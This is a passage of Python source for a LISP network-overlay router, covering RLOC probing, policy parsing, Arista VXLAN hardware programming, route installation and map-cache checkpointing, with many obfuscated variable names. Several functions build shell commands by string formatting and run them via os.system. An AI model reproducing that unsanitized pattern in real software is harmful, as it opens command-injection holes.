                if (echo_nonce and echo_nonce.recently_echoed()):
                    lprint(("Suppress RLOC-probe to {}, nonce-echo " +
                        "received").format(red(addr_str, False)))
                    continue

                #
                # No probe-reply within the wait window; mark the RLOC
                # unreachable for this and all other EIDs that use it, but
                # still probe it.
                #
                if (rloc.last_rloc_probe != None):
                    last = rloc.last_rloc_probe_reply
                    if (last == None): last = 0
                    delta = time.time() - last
                    if (rloc.up_state() and
                        delta >= LISP_RLOC_PROBE_REPLY_WAIT):
                        rloc.state = LISP_RLOC_UNREACH_STATE
                        rloc.last_state_change = lisp_get_timestamp()
                        lisp_update_rtr_updown(rloc.rloc, False)
                        unreach = bold("unreachable", False)
                        lprint("RLOC {} went {}, probe it".format(
                            red(addr_str, False), unreach))
                        lisp_mark_rlocs_for_other_eids(values)

                rloc.last_rloc_probe = lisp_get_timestamp()

                reach = "" if rloc.unreach_state() == False else \
                    " unreachable"

                #
                # For a multihomed exit, install a host route so the probe
                # egresses via the next-hop being tested.
                #
                nh_str = ""
                nh = None
                if (rloc.rloc_next_hop != None):
                    device, nh = rloc.rloc_next_hop
                    lisp_install_host_route(addr_str, nh, True)
                    nh_str = ", send on nh {}({})".format(nh, device)

                #
                # Print the last measured RTT and send the probe.
                #
                rtt = rloc.print_rloc_probe_rtt()
                astr = addr_str
                if (rloc.translated_port != 0):
                    astr += ":{}".format(rloc.translated_port)

                astr = red(astr, False)
                if (rloc.rloc_name != None):
                    astr += " (" + blue(rloc.rloc_name, False) + ")"

                lprint("Send {}{} {}, last rtt: {}{}".format(probe_str,
                    reach, astr, rtt, nh_str))

                #
                # Save and remove any host route already installed for
                # this RLOC so the probe route controls the path.
                #
                if (rloc.rloc_next_hop != None):
                    saved_nh = lisp_get_host_route_next_hop(addr_str)
                    if (saved_nh):
                        lisp_install_host_route(addr_str, saved_nh, False)

                #
                # Chained next_rloc entries may carry no address; copy the
                # parent's.
                #
                if (rloc.rloc.is_null()):
                    rloc.rloc.copy_address(parent_rloc.rloc)

                #
                # Send the Map-Request RLOC-probe.
                #
                seid = None if (group.is_null()) else eid
                deid = eid if (group.is_null()) else group
                lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
                last_rloc = parent_rloc

                #
                # Remove the probe host route and reinstall the saved one.
                #
                if (nh): lisp_install_host_route(addr_str, nh, False)
                if (saved_nh): lisp_install_host_route(addr_str, saved_nh,
                    True)

            #
            # Pace probing, sleep briefly every 10th probe.
            #
            count += 1
            if ((count % 10) == 0): time.sleep(0.020)

    lprint("---------- End RLOC Probing ----------")
    return

#
# lisp_update_rtr_updown
#
# Tell the lisp-etr process (via the lisp-itr process's IPC socket) that
# an RTR has changed reachability state.
#
def lisp_update_rtr_updown(rtr, updown):
    global lisp_ipc_socket

    #
    # Only the ITR tracks RTR state.
    #
    if (lisp_i_am_itr == False): return

    #
    # When "register-all-rtrs" is configured, all RTRs are registered
    # regardless of state, so there is nothing to report.
    #
    if (lisp_register_all_rtrs): return

    rtr_str = rtr.print_address_no_iid()

    #
    # Ignore RTRs that are not in our RTR list.
    #
    if ((rtr_str in lisp_rtr_list) == False): return

    updown = "up" if updown else "down"
    lprint("Send ETR IPC message, RTR {} went {}".format(
        red(rtr_str, False), bold(updown, False)))

    #
    # Build and send the IPC message.
    #
    ipc = "rtr%{}%{}".format(rtr_str, updown)
    ipc = lisp_command_ipc(ipc, "lisp-itr")
    lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
    return

#
# lisp_process_rloc_probe_reply
#
# Process an RLOC-probe Map-Reply. Find the RLOC in the RLOC probe-list
# and update probe state for every EID-prefix that uses it. "mrloc" is set
# when the reply is for a member of a multicast RLOC's replication list.
#
def lisp_process_rloc_probe_reply(rloc_entry, source, port, map_reply, ttl,
    mrloc):
    rloc = rloc_entry.rloc
    nonce = map_reply.nonce
    hop_count = map_reply.hop_count
    probe = bold("RLOC-probe reply", False)
    rloc_str = rloc.print_address_no_iid()
    source_str = source.print_address_no_iid()
    probe_list = lisp_rloc_probe_list
    json_str = rloc_entry.json.json_string if rloc_entry.json else None
    ts = lisp_get_timestamp()

    #
    # Reply from a member of a multicast RLOC's replication list. Keep the
    # per-member copy in the parent's multicast_rloc_probe_list current
    # and update both the member and the parent.
    #
    if (mrloc != None):
        mrloc_str = mrloc.rloc.print_address_no_iid()
        if ((rloc_str in mrloc.multicast_rloc_probe_list) == False):
            mcast_rloc = copy.deepcopy(mrloc)
            mcast_rloc.rloc.copy_address(rloc)
            mcast_rloc.multicast_rloc_probe_list = {}
            mrloc.multicast_rloc_probe_list[rloc_str] = mcast_rloc

        mcast_rloc = mrloc.multicast_rloc_probe_list[rloc_str]
        mcast_rloc.last_rloc_probe_nonce = mrloc.last_rloc_probe_nonce
        mcast_rloc.last_rloc_probe = mrloc.last_rloc_probe
        r, eid, group = lisp_rloc_probe_list[mrloc_str][0]
        mcast_rloc.process_rloc_probe_reply(ts, nonce, eid, group,
            hop_count, ttl, json_str)
        mrloc.process_rloc_probe_reply(ts, nonce, eid, group, hop_count,
            ttl, json_str)
        return

    #
    # Find the probe-list key: try the RLOC address, then RLOC:port, then
    # the reply's source address, then source:port (the NAT-traversal
    # cases).
    #
    addr_str = rloc_str
    if ((addr_str in probe_list) == False):
        addr_str += ":" + str(port)
        if ((addr_str in probe_list) == False):
            addr_str = source_str
            if ((addr_str in probe_list) == False):
                addr_str += ":" + str(port)
                lprint(" Received unsolicited {} from {}/{}, port {}".\
                    format(probe, red(rloc_str, False), red(source_str,
                    False), port))
                return

    #
    # Update probe state for each (rloc, eid, group) that uses this RLOC.
    #
    for rloc, eid, group in lisp_rloc_probe_list[addr_str]:
        if (lisp_i_am_rtr):
            if (rloc.translated_port != 0 and
                rloc.translated_port != port):
                continue

        rloc.process_rloc_probe_reply(ts, nonce, eid, group, hop_count,
            ttl, json_str)
    return

#
# lisp_db_list_length
#
# Return the number of database-mapping entries, counting each dynamic-EID
# and each instance-id in an EID's iid-list separately.
#
def lisp_db_list_length():
    count = 0
    for db in lisp_db_list:
        count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
        count += len(db.eid.iid_list)
    return(count)
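
#
# Counting sketch (hypothetical config): a database-mapping in dynamic-EID
# mode contributes one count per currently discovered dynamic-EID; a
# static mapping contributes 1; each additional instance-id in the EID's
# iid-list adds 1 more.
#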

#
# lisp_is_myeid
#
# Return True if "eid" is covered by any configured database-mapping
# EID-prefix.
#
def lisp_is_myeid(eid):
    for db in lisp_db_list:
        if (eid.is_more_specific(db.eid)): return(True)
    return(False)

#
# lisp_format_macs
#
# Format two 12-hex-character MAC address strings into dashed notation and
# return "source -> dest".
#
def lisp_format_macs(sa, da):
    sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
    da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
    return("{} -> {}".format(sa, da))

#
# lisp_get_echo_nonce
#
# Return the nonce-echo state for an RLOC, or None when nonce-echoing is
# not enabled or no state exists yet.
#
def lisp_get_echo_nonce(rloc, rloc_str):
    if (lisp_nonce_echoing == False): return(None)

    if (rloc): rloc_str = rloc.print_address_no_iid()
    echo_nonce = None
    if (rloc_str in lisp_nonce_echo_list):
        echo_nonce = lisp_nonce_echo_list[rloc_str]
    return(echo_nonce)

#
# lisp_decode_dist_name
#
# Parse a null-terminated distinguished-name from the front of "packet".
# Return the remaining packet and the name, or [None, None] when the name
# reaches 255 characters without a terminator.
#
def lisp_decode_dist_name(packet):
    count = 0
    dist_name = ""

    while (packet[0:1] != "\0"):
        if (count == 255): return([None, None])
        dist_name += packet[0:1]
        packet = packet[1::]
        count += 1

    packet = packet[1::]
    return(packet, dist_name)
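
#
# Decoding sketch (illustrative bytes): given "www-server\0<rest>", the
# call returns ("<rest>", "www-server"); the null terminator is consumed.
#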

#
# lisp_write_flow_log
#
# Append each buffered flow entry to ./logs/lisp-flow.log and free the
# buffer.
#
def lisp_write_flow_log(flow_log):
    f = open("./logs/lisp-flow.log", "a")

    count = 0
    for flow in flow_log:
        packet = flow[3]
        flow_str = packet.print_flow(flow[0], flow[1], flow[2])
        f.write(flow_str)
        count += 1
    f.close()
    del(flow_log)

    count = bold(str(count), False)
    lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
    return

#
# lisp_policy_command
#
# Build a lisp_policy() from the kv_pair delivered by the command parser.
# Match keywords arrive as parallel arrays (one slot per match clause);
# set-* keywords are scalars applied to the policy as a whole.
#
def lisp_policy_command(kv_pair):
    p = lisp_policy("")
    set_iid = None

    match_clauses = []
    for i in range(len(kv_pair["datetime-range"])):
        match_clauses.append(lisp_policy_match())

    for kw in kv_pair.keys():
        value = kv_pair[kw]

        #
        # Store match parameters.
        #
        if (kw == "instance-id"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                m = match_clauses[i]
                if (m.source_eid == None):
                    m.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                if (m.dest_eid == None):
                    m.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                m.source_eid.instance_id = int(v)
                m.dest_eid.instance_id = int(v)

        if (kw == "source-eid"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                m = match_clauses[i]
                if (m.source_eid == None):
                    m.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                iid = m.source_eid.instance_id
                m.source_eid.store_prefix(v)
                m.source_eid.instance_id = iid

        if (kw == "destination-eid"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                m = match_clauses[i]
                if (m.dest_eid == None):
                    m.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                iid = m.dest_eid.instance_id
                m.dest_eid.store_prefix(v)
                m.dest_eid.instance_id = iid

        if (kw == "source-rloc"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                m = match_clauses[i]
                m.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
                m.source_rloc.store_prefix(v)

        if (kw == "destination-rloc"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                m = match_clauses[i]
                m.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
                m.dest_rloc.store_prefix(v)

        if (kw == "rloc-record-name"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                m = match_clauses[i]
                m.rloc_record_name = v

        if (kw == "geo-name"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                m = match_clauses[i]
                m.geo_name = v

        if (kw == "elp-name"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                m = match_clauses[i]
                m.elp_name = v

        if (kw == "rle-name"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                m = match_clauses[i]
                m.rle_name = v

        if (kw == "json-name"):
            for i in range(len(match_clauses)):
                v = value[i]
                if (v == ""): continue
                m = match_clauses[i]
                m.json_name = v

        if (kw == "datetime-range"):
            for i in range(len(match_clauses)):
                v = value[i]
                m = match_clauses[i]
                if (v == ""): continue
                lower = lisp_datetime(v[0:19])
                upper = lisp_datetime(v[19::])
                if (lower.valid_datetime() and upper.valid_datetime()):
                    m.datetime_lower = lower
                    m.datetime_upper = upper

        #
        # Store set parameters.
        #
        if (kw == "set-action"):
            p.set_action = value

        if (kw == "set-record-ttl"):
            p.set_record_ttl = int(value)

        if (kw == "set-instance-id"):
            if (p.set_source_eid == None):
                p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            if (p.set_dest_eid == None):
                p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            set_iid = int(value)
            p.set_source_eid.instance_id = set_iid
            p.set_dest_eid.instance_id = set_iid

        if (kw == "set-source-eid"):
            if (p.set_source_eid == None):
                p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            p.set_source_eid.store_prefix(value)
            if (set_iid != None): p.set_source_eid.instance_id = set_iid

        if (kw == "set-destination-eid"):
            if (p.set_dest_eid == None):
                p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            p.set_dest_eid.store_prefix(value)
            if (set_iid != None): p.set_dest_eid.instance_id = set_iid

        if (kw == "set-rloc-address"):
            p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
            p.set_rloc_address.store_address(value)

        if (kw == "set-rloc-record-name"):
            p.set_rloc_record_name = value

        if (kw == "set-elp-name"):
            p.set_elp_name = value

        if (kw == "set-geo-name"):
            p.set_geo_name = value

        if (kw == "set-rle-name"):
            p.set_rle_name = value

        if (kw == "set-json-name"):
            p.set_json_name = value

        if (kw == "policy-name"):
            p.policy_name = value

    #
    # Attach match clauses and save the policy.
    #
    p.match_clauses = match_clauses
    p.save_policy()
    return
if 16 - 16: ooOoO0o / o0oOOo0O0Ooo - O0 * I1IiiI
if 13 - 13: iII111i . iII111i % O0 % o0oOOo0O0Ooo
lisp_policy_commands = {
    "lisp policy" : [lisp_policy_command, {
        "policy-name" : [True],
        "match" : [],
        "instance-id" : [True, 0, 0xffffffff],
        "source-eid" : [True],
        "destination-eid" : [True],
        "source-rloc" : [True],
        "destination-rloc" : [True],
        "rloc-record-name" : [True],
        "elp-name" : [True],
        "geo-name" : [True],
        "rle-name" : [True],
        "json-name" : [True],
        "datetime-range" : [True],
        "set-action" : [False, "process", "drop"],
        "set-record-ttl" : [True, 0, 0x7fffffff],
        "set-instance-id" : [True, 0, 0xffffffff],
        "set-source-eid" : [True],
        "set-destination-eid" : [True],
        "set-rloc-address" : [True],
        "set-rloc-record-name" : [True],
        "set-elp-name" : [True],
        "set-geo-name" : [True],
        "set-rle-name" : [True],
        "set-json-name" : [True]}]
}
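#
# How to read the syntax table above (an inference from the values
# present, not documented in the original source): each keyword maps to
# a list whose first element appears to indicate whether the keyword
# takes a value. Numeric entries like [True, 0, 0xffffffff] look like a
# permitted value range, and entries like [False, "process", "drop"]
# look like an enumeration of the legal values.
#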
def lisp_send_to_arista(command, interface):
    interface = "" if (interface == None) else "interface " + interface

    ii1i1iIi1Ii1I1 = command
    if (interface != ""): ii1i1iIi1Ii1I1 = interface + ": " + ii1i1iIi1Ii1I1
    lprint("Send CLI command '{}' to hardware".format(ii1i1iIi1Ii1I1))

    #
    # Note this local "commands" string shadows the commands module, but
    # only inside this function.
    #
    commands = '''
enable
configure
{}
{}
'''.format(interface, command)

    os.system("FastCli -c '{}'".format(commands))
    return
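#
# Illustrative usage of lisp_send_to_arista() (hypothetical values, not
# part of the original source):
#
#   lisp_send_to_arista("ip address 10.0.0.1/24", "Ethernet1")
#   lisp_send_to_arista("hostname lisp-xtr", None)
#
# The first call wraps the command in an "interface Ethernet1" context;
# the second runs it at global configuration level.
#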
def lisp_arista_is_alive(prefix):
    ooO0ooooO = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
    Oo0Ooo0O0 = commands.getoutput("FastCli -c '{}'".format(ooO0ooooO))

    #
    # Skip the column-header line, then take the last column of the route
    # row; a "Y" there appears to be the hardware hit/alive flag.
    #
    Oo0Ooo0O0 = Oo0Ooo0O0.split("\n")[1]
    IiiI11ii = Oo0Ooo0O0.split(" ")
    IiiI11ii = IiiI11ii[-1].replace("\r", "")

    return (IiiI11ii == "Y")
def lisp_program_vxlan_hardware(mc):
    #
    # Only run on systems that have the lispers.net directory present.
    #
    if (os.path.exists("/persist/local/lispers.net") == False): return

    #
    # Need at least one RLOC in the map-cache entry.
    #
    if (len(mc.best_rloc_set) == 0): return

    #
    # Get the EID-prefix and the best RLOC to program.
    #
    IiI1Iiii = mc.eid.print_prefix_no_iid()
    I1IIiIIIii = mc.best_rloc_set[0].rloc.print_address_no_iid()

    #
    # If a route for the EID-prefix already points out vlan4094, the
    # hardware is already programmed.
    #
    o0O00OOo = commands.getoutput("ip route get {} | egrep vlan4094".format(IiI1Iiii))
    if (o0O00OOo != ""):
        lprint("Route {} already in hardware: '{}'".format(green(IiI1Iiii, False), o0O00OOo))
        return

    #
    # A VXLAN interface and vlan4094 with an IP address must exist.
    #
    Ii1o0O00ooo = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
    if (Ii1o0O00ooo.find("vxlan") == -1):
        lprint("No VXLAN interface found, cannot program hardware")
        return
    if (Ii1o0O00ooo.find("vlan4094") == -1):
        lprint("No vlan4094 interface found, cannot program hardware")
        return

    O0O0iIIi11Ii = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
    if (O0O0iIIi11Ii == ""):
        lprint("No IP address found on vlan4094, cannot program hardware")
        return

    O0O0iIIi11Ii = O0O0iIIi11Ii.split("inet ")[1]
    O0O0iIIi11Ii = O0O0iIIi11Ii.split("/")[0]

    #
    # Collect addresses already present in the vlan4094 ARP cache (the
    # incomplete entries) so a free next-hop address can be allocated.
    #
    oo00o = []
    o000 = commands.getoutput("arp -i vlan4094").split("\n")
    for oOOo0ooO0 in o000:
        if (oOOo0ooO0.find("vlan4094") == -1): continue
        if (oOOo0ooO0.find("(incomplete)") == -1): continue
        II11111Iii1I = oOOo0ooO0.split(" ")[0]
        oo00o.append(II11111Iii1I)

    #
    # Pick the first host address on the vlan4094 subnet that is not in
    # use and is not our own address.
    #
    II11111Iii1I = None
    Ii1iIiI1I = O0O0iIIi11Ii
    O0O0iIIi11Ii = O0O0iIIi11Ii.split(".")
    for IiIIi1IiiIiI in range(1, 255):
        O0O0iIIi11Ii[3] = str(IiIIi1IiiIiI)
        IiiIIi1 = ".".join(O0O0iIIi11Ii)
        if (IiiIIi1 in oo00o): continue
        if (IiiIIi1 == Ii1iIiI1I): continue
        II11111Iii1I = IiiIIi1
        break

    if (II11111Iii1I == None):
        lprint("Address allocation failed for vlan4094, cannot program " + "hardware")
        return

    #
    # Build a MAC address for the next-hop from the low 3 bytes of the
    # RLOC address, install a static ARP entry for it, and point a static
    # MAC table entry at the VXLAN VTEP.
    #
    OOO = I1IIiIIIii.split(".")
    ooOo0O = lisp_hex_string(OOO[1]).zfill(2)
    OOoo0oo0oO0O = lisp_hex_string(OOO[2]).zfill(2)
    OoOo0O0O00O000o = lisp_hex_string(OOO[3]).zfill(2)
    Ii = "00:00:00:{}:{}:{}".format(ooOo0O, OOoo0oo0oO0O, OoOo0O0O00O000o)
    iIo0o000OOO00O = "0000.00{}.{}{}".format(ooOo0O, OOoo0oo0oO0O, OoOo0O0O00O000o)
    IIiIiii1I1i = "arp -i vlan4094 -s {} {}".format(II11111Iii1I, Ii)
    os.system(IIiIiii1I1i)

    oOoo0O0oO0 = ("mac address-table static {} vlan 4094 " + "interface vxlan 1 vtep {}").format(iIo0o000OOO00O, I1IIiIIIii)
    lisp_send_to_arista(oOoo0O0oO0, None)

    #
    # Finally, route the EID-prefix to the allocated next-hop.
    #
    OoooO0O0o0oOO = "ip route add {} via {}".format(IiI1Iiii, II11111Iii1I)
    os.system(OoooO0O0o0oOO)

    lprint("Hardware programmed with commands:")
    OoooO0O0o0oOO = OoooO0O0o0oOO.replace(IiI1Iiii, green(IiI1Iiii, False))
    lprint("  " + OoooO0O0o0oOO)
    lprint("  " + IIiIiii1I1i)
    oOoo0O0oO0 = oOoo0O0oO0.replace(I1IIiIIIii, red(I1IIiIIIii, False))
    lprint("  " + oOoo0O0oO0)
    return
def lisp_clear_hardware_walk(mc, parms):
    IIII1 = mc.eid.print_prefix_no_iid()
    os.system("ip route delete {}".format(IIII1))
    return ([True, None])
def lisp_clear_map_cache():
    global lisp_map_cache, lisp_rloc_probe_list
    global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
    global lisp_rtr_list, lisp_gleaned_groups
    global lisp_no_map_request_rate_limit

    IiI111i = bold("User cleared", False)
    I1I1 = lisp_map_cache.cache_count
    lprint("{} map-cache with {} entries".format(IiI111i, I1I1))

    if (lisp_program_hardware):
        lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
    lisp_map_cache = lisp_cache()

    #
    # Restart the Map-Request rate-limit window.
    #
    lisp_no_map_request_rate_limit = lisp_get_timestamp()

    #
    # Clear the RLOC-probe list, the encap/decap crypto keys, the RTR
    # list, and the gleaned groups.
    #
    lisp_rloc_probe_list = {}
    lisp_crypto_keys_by_rloc_encap = {}
    lisp_crypto_keys_by_rloc_decap = {}
    lisp_rtr_list = {}
    lisp_gleaned_groups = {}

    #
    # Tell an external data-plane, if one is running, that the map-cache
    # was cleared.
    #
    lisp_process_data_plane_restart(True)
    return
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
    if (len(lisp_sockets) != 4): return

    IIiI11ii111i = lisp_myrlocs[0]

    #
    # Build an IPv4 header (20 bytes) and a UDP header (8 bytes) in front
    # of the control packet; total length is the payload plus 28.
    #
    IiiI1iii1iIiiI = len(packet) + 28
    Ooo0oO = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(IiiI1iii1iIiiI), 0, 64,
        17, 0, socket.htonl(IIiI11ii111i.address), socket.htonl(rloc.address))
    Ooo0oO = lisp_ip_checksum(Ooo0oO)

    o0oOo00 = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
        socket.htons(IiiI1iii1iIiiI - 20), 0)

    packet = lisp_packet(Ooo0oO + o0oOo00 + packet)

    #
    # Fill in the inner and outer address fields so the packet can be
    # LISP data encapsulated.
    #
    packet.inner_dest.copy_address(rloc)
    packet.inner_dest.instance_id = 0xffffff
    packet.inner_source.copy_address(IIiI11ii111i)
    packet.inner_ttl = 64
    packet.outer_dest.copy_address(rloc)
    packet.outer_source.copy_address(IIiI11ii111i)
    packet.outer_version = packet.outer_dest.afi_to_version()
    packet.outer_ttl = 64
    packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT

    o0oooOoOoOo = red(rloc.print_address_no_iid(), False)
    if (nat_info):
        I1I1111I11I = " {}".format(blue(nat_info.hostname, False))
        oO0oo000O = bold("RLOC-probe request", False)
    else:
        I1I1111I11I = ""
        oO0oo000O = bold("RLOC-probe reply", False)

    lprint(("Data encapsulate {} to {}{} port {} for " + "NAT-traversal").format(oO0oo000O, o0oooOoOoOo, I1I1111I11I, packet.encap_port))

    #
    # Encode and send the encapsulated RLOC-probe.
    #
    if (packet.encode(None) == None): return
    packet.print_packet("Send", True)

    IiiIii11I1i1I = lisp_sockets[3]
    packet.send_packet(IiiIii11I1i1I, packet.outer_dest)
    del (packet)
    return
def lisp_get_default_route_next_hops():
    #
    # On macOS, parse "route -n get default" for the gateway and
    # interface.
    #
    if (lisp_is_macos()):
        ooO0ooooO = "route -n get default"
        oOOO0OoO = commands.getoutput(ooO0ooooO).split("\n")
        iiiI1i1Iii1ii = II1i = None
        for OOO000 in oOOO0OoO:
            if (OOO000.find("gateway: ") != -1): iiiI1i1Iii1ii = OOO000.split(": ")[1]
            if (OOO000.find("interface: ") != -1): II1i = OOO000.split(": ")[1]
        return ([[II1i, iiiI1i1Iii1ii]])

    #
    # On Linux, parse each "default via <nh> dev <device>" line, skipping
    # routes that carry a metric.
    #
    ooO0ooooO = "ip route | egrep 'default via'"
    O0o00o000 = commands.getoutput(ooO0ooooO).split("\n")

    O0OoooOoo = []
    for o0O00OOo in O0o00o000:
        if (o0O00OOo.find(" metric ") != -1): continue
        O0OOOO0o0O = o0O00OOo.split(" ")
        try:
            I1iI11I1i = O0OOOO0o0O.index("via") + 1
            if (I1iI11I1i >= len(O0OOOO0o0O)): continue
            OO0OoOOoO00Oo = O0OOOO0o0O.index("dev") + 1
            if (OO0OoOOoO00Oo >= len(O0OOOO0o0O)): continue
        except:
            continue

        O0OoooOoo.append([O0OOOO0o0O[OO0OoOOoO00Oo], O0OOOO0o0O[I1iI11I1i]])

    return (O0OoooOoo)
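#
# Return shape of lisp_get_default_route_next_hops(), for reference
# (addresses hypothetical): a list of [device, next-hop] pairs, e.g.
# [["eth0", "192.168.1.1"], ["eth1", "10.0.0.1"]].
#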
def lisp_get_host_route_next_hop(rloc):
    ooO0ooooO = "ip route | egrep '{} via'".format(rloc)
    o0O00OOo = commands.getoutput(ooO0ooooO).split(" ")

    try: ooo = o0O00OOo.index("via") + 1
    except: return (None)

    if (ooo >= len(o0O00OOo)): return (None)
    return (o0O00OOo[ooo])
def lisp_install_host_route(dest, nh, install):
    install = "add" if install else "delete"
    OO0oooO = "none" if nh == None else nh

    lprint("{} host-route {}, nh {}".format(install.title(), dest, OO0oooO))

    if (nh == None):
        iI1I1 = "ip route {} {}/32".format(install, dest)
    else:
        iI1I1 = "ip route {} {}/32 via {}".format(install, dest, nh)

    os.system(iI1I1)
    return
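#
# Illustrative usage of lisp_install_host_route() (hypothetical
# addresses, not part of the original source):
#
#   lisp_install_host_route("10.1.1.1", "192.168.1.254", True)    # add
#   lisp_install_host_route("10.1.1.1", None, False)              # delete
#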
def lisp_checkpoint(checkpoint_list):
    if (lisp_checkpoint_map_cache == False): return

    OOO000 = open(lisp_checkpoint_filename, "w")
    for i1ii1i1Ii11 in checkpoint_list:
        OOO000.write(i1ii1i1Ii11 + "\n")
    OOO000.close()
    lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
        len(checkpoint_list), lisp_checkpoint_filename))
    return
def lisp_load_checkpoint():
    if (lisp_checkpoint_map_cache == False): return
    if (os.path.exists(lisp_checkpoint_filename) == False): return

    OOO000 = open(lisp_checkpoint_filename, "r")

    I1I1 = 0
    for i1ii1i1Ii11 in OOO000:
        I1I1 += 1
        oOo = i1ii1i1Ii11.split(" rloc ")
        ooOOo = [] if (oOo[1] in ["native-forward\n", "\n"]) else oOo[1].split(", ")

        #
        # Rebuild the RLOC set for this entry.
        #
        OoO0oOOooOO = []
        for I1IIiIIIii in ooOOo:
            i1III111 = lisp_rloc(False)
            O0OOOO0o0O = I1IIiIIIii.split(" ")
            i1III111.rloc.store_address(O0OOOO0o0O[0])
            i1III111.priority = int(O0OOOO0o0O[1])
            i1III111.weight = int(O0OOOO0o0O[2])
            OoO0oOOooOO.append(i1III111)

        o0o000Oo = lisp_mapping("", "", OoO0oOOooOO)
        if (o0o000Oo != None):
            o0o000Oo.eid.store_prefix(oOo[0])
            o0o000Oo.checkpoint_entry = True
            o0o000Oo.map_cache_ttl = LISP_NMR_TTL * 60
            if (OoO0oOOooOO == []): o0o000Oo.action = LISP_NATIVE_FORWARD_ACTION
            o0o000Oo.add_cache()
            continue

        I1I1 -= 1

    OOO000.close()
    lprint("{} {} map-cache entries from file '{}'".format(
        bold("Loaded", False), I1I1, lisp_checkpoint_filename))
    return
def lisp_write_checkpoint_entry(checkpoint_list, mc):
    if (lisp_checkpoint_map_cache == False): return

    i1ii1i1Ii11 = "{} rloc ".format(mc.eid.print_prefix())

    for i1III111 in mc.rloc_set:
        if (i1III111.rloc.is_null()): continue
        i1ii1i1Ii11 += "{} {} {}, ".format(i1III111.rloc.print_address_no_iid(),
            i1III111.priority, i1III111.weight)

    if (mc.rloc_set != []):
        i1ii1i1Ii11 = i1ii1i1Ii11[0:-2]
    elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
        i1ii1i1Ii11 += "native-forward"

    checkpoint_list.append(i1ii1i1Ii11)
    return
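#
# Checkpoint file line format, as produced above and parsed back by
# lisp_load_checkpoint() (addresses hypothetical; the EID-prefix text
# comes from print_prefix(), so the bracketed instance-id rendering is
# an assumption here):
#
#   [1000]10.1.0.0/16 rloc 192.168.1.1 1 100, 192.168.2.1 2 50
#   [1000]10.2.0.0/16 rloc native-forward
#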
def lisp_check_dp_socket():
    i1Ii11IIIi = lisp_ipc_dp_socket_name
    if (os.path.exists(i1Ii11IIIi) == False):
        ooO0 = bold("does not exist", False)
        lprint("Socket '{}' {}".format(i1Ii11IIIi, ooO0))
        return (False)
    return (True)
def lisp_write_to_dp_socket(entry):
    #
    # Pre-initialize so the except-clause can reference the record even
    # when json.dumps() itself is what failed.
    #
    II1i1I1IIiII1 = "?"
    try:
        II1i1I1IIiII1 = json.dumps(entry)
        O00oOooo0o = bold("Write IPC", False)
        lprint("{} record to named socket: '{}'".format(O00oOooo0o, II1i1I1IIiII1))
        lisp_ipc_dp_socket.sendto(II1i1I1IIiII1, lisp_ipc_dp_socket_name)
    except:
        lprint("Failed to write IPC record to named socket: '{}'".format(II1i1I1IIiII1))
    return
def lisp_write_ipc_keys(rloc):
    oo0o00OO = rloc.rloc.print_address_no_iid()
    Oo0O00O = rloc.translated_port
    if (Oo0O00O != 0): oo0o00OO += ":" + str(Oo0O00O)
    if (lisp_rloc_probe_list.has_key(oo0o00OO) == False): return

    for O0OOOO0o0O, oOo, i11ii in lisp_rloc_probe_list[oo0o00OO]:
        o0o000Oo = lisp_map_cache.lookup_cache(oOo, True)
        if (o0o000Oo == None): continue
        lisp_write_ipc_map_cache(True, o0o000Oo)
    return
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
    if (lisp_i_am_etr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    #
    # Build the JSON record for the map-cache entry. Multicast entries
    # carry an "rles" array; unicast entries carry an "rlocs" array.
    #
    IiI1III = "add" if add_or_delete else "delete"
    i1ii1i1Ii11 = { "type" : "map-cache", "opcode" : IiI1III }

    o0oO0O00 = (mc.group.is_null() == False)
    if (o0oO0O00):
        i1ii1i1Ii11["eid-prefix"] = mc.group.print_prefix_no_iid()
        i1ii1i1Ii11["rles"] = []
    else:
        i1ii1i1Ii11["eid-prefix"] = mc.eid.print_prefix_no_iid()
        i1ii1i1Ii11["rlocs"] = []
    i1ii1i1Ii11["instance-id"] = str(mc.eid.instance_id)

    if (o0oO0O00):
        if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
            for Iii in mc.rloc_set[0].rle.rle_forwarding_list:
                IiiIIi1 = Iii.address.print_address_no_iid()
                Oo0O00O = str(4341) if Iii.translated_port == 0 else str(Iii.translated_port)
